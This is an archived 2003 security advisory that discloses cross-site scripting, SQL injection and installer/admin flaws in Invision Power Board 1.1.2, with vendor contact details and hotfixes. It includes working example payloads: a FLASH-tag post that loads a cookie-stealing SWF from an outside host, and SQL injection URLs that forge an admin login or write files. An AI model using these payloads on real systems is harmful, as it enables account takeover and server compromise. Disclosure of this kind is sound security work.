TUCoPS :: Web BBS :: Frequently Exploited :: invision.txt

InVision Power Board multiple vulns 


===========================================
Security REPORT Invision Power Board v1.1.2
===========================================

Product:	Power Board v1.1.2 (maybe earlier Versions)
Vulnerablities:	cross site scripting, sql-injection, install- and admin-issues, os-command execution
Vuln.-Classes:	Check out http://www.owasp.org/asac/ for more detailed information on "Attack Components"
Vendor:		http://www.invisionboard.com/
Vendor-Status:	contacted "info@invisionpower.com" on Jul.11th 2003 
Vendor-Patchs:	http://www.invisionboard.com/downloads/chat.zip

Exploitable:
Local:		---
Remote:		YES

============
Introduction
============

Visit "http://www.invisionboard.com/" for additional information.

=====================
Vulnerability Details
=====================


1) CROSS-SITE-SCRIPTING
=======================

OBJECT:
Post.php   

DESCRIPTION:
by using [FLASH=h,w][/FLASH]-tags within a posting(Post-textarea) it is possible to execute 
arbitrary client-scripts ... thus leading to cookie-theft.

the usage of flash tags is allowed per default in "conf_global.php":
---*---
$INFO['allow_flash'] = '1';
---*---

EXAMPLE-Content:
---*---
hey dude, whats up?
[FLASH=2,2]http://anotherhost.ext/cookie-thief.swf[/FLASH]
cu,
jonnie
---*---

2) SQL-INJECTION
================

OBJECT:
ipchat.php

DESCRIPTION:
depending on mysql-version and/or drivers it is possible to change the result of sql-queries.


EXAMPLE(mySql > 4):
---*---
http://localhost/ibo/ipchat.php?password=1&username=9x%2527+union+select+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f*+
---*---

EXAMPLE(with file-permission set):
---*---
http://localhost/ibo/ipchat.php?password=1&username=admin%2527into+outfile+%2527[fullpath]%2527--+
---*---

3) INSTALLER-, ADMIN-ISSUES
===========================

if for some reason(permissions, directory-moving) the installer-lockfile(install.lock) is missing, any user can use the "sm_install.php" - script. 

once administrator .. one is able to:
 
A) execute arbitrary SQL-QUERIES thru "admin.php/act=mysql/code=runsql/query=sq"
B) upload arbitrary files(including programms and scripts) into the "emoticons" directory.

.. thus leading to a "total" compromise of the http-servers account.


=======
Remarks
=======

---

====================
Recommended Hotfixes
====================

disallow flash in "conf_global.php".
check for installer-lockfile.

software patch(es).


EOF Martin Eiszner / @2003WebSec.org


=======
Contact
=======

WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna

Austria / EUROPE

mei@websec.org
http://www.websec.org

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH